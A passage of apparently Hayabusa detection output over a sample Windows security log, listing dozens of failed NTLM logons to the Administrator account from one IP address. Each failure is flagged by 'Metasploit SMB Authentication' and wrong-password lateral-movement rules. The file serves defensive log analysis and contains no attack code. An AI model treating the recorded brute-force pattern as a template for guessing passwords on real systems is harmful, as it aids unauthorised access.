SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: 
